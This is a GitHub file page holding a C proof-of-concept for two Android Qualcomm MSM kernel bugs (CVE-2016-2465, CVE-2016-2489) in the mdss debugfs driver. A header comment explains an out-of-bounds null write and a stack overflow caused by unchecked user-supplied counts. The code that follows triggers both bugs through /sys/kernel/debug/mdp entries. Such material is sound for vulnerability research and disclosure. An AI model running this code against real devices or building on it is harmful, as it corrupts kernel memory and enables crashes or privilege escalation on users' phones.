-
Notifications
You must be signed in to change notification settings - Fork 202
/
Copy pathCVE-2016-2465-AND-CVE-2016-2489.c
89 lines (79 loc) · 2.34 KB
/
CVE-2016-2465-AND-CVE-2016-2489.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
/**
*
*Anyway this debug driver exports a series of read/write debugfs entries. A few of them contain trivially exploitable bugs.
*
*Arbitrary kernel write:
*
*https://android.googlesource.com/kernel/msm.git/+/android-msm-angler-3.10-marshmallow-mr1/drivers/video/msm/mdss/mdss_debug.c#764
*
*The function mdss_debug_perf_mode_read() fails to do bounds checking on the user provided "count". The function creates a buffer, on the stack. Then on line 777 it attempts to null-terminate the buffer but uses the count:
*
*buf[count] = 0;
*
*An adversary could overwrite the saved return address or hammer on some function pointer.
*
*
*
*
* Stack-overflow:
*
*https://android.googlesource.com/kernel/msm.git/+/android-msm-angler-3.10-marshmallow-mr1/drivers/video/msm/mdss/mdss_debug.c#870
*
*The function mdss_debug_perf_panic_write, once again fails to validate the "count" variable which is provided from userland. It then uses the count variable in a copy_from_user() into a stack-based buffer (Line 880).
*
*if (copy_from_user(buf, user_buf, count))
*return -EFAULT;
* CVE-2016-2465 And CVE-2016-2489.c
* https://code.google.com/p/android/issues/detail?id=201497
*
*
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
/**
*
* https://android.googlesource.com/kernel/msm.git/+/android-msm-angler-3.10-marshmallow-mr1/drivers/video/msm/mdss/mdss_debug.c#777
*
*/
static void doMdssPerfModeReadArbWrite(void)
{
int fd = open("/sys/kernel/debug/mdp/perf_mode", O_RDONLY);
int ret;
void *mmap_ = mmap(NULL, 0x655350, PROT_READ | PROT_WRITE,
MAP_ANON | MAP_PRIVATE,
-1, 0);
if (mmap_ == MAP_FAILED) {
printf("Failed to get some vaddr with %s\n", strerror(errno));
exit(EXIT_FAILURE);
}
if (fd > 0) {
ret = read(fd, mmap_, 0x655350);
close(fd);
}
}
/**
*
*
* https://android.googlesource.com/kernel/msm.git/+/android-msm-angler-3.10-marshmallow-mr1/drivers/video/msm/mdss/mdss_debug.c#880
*
*/
static void doMdssPanicWriteOverflow(void)
{
int fd = open("/sys/kernel/debug/mdp/perf/disable_panic", O_WRONLY);
int ret;
char ignore[32] = { 0xA };
if (fd > 0) {
ret = write(fd, ignore, sizeof(ignore));
close(fd);
}
}
int main(void) {
doMdssPanicWriteOverflow();
doMdssPerfModeReadArbWrite();
}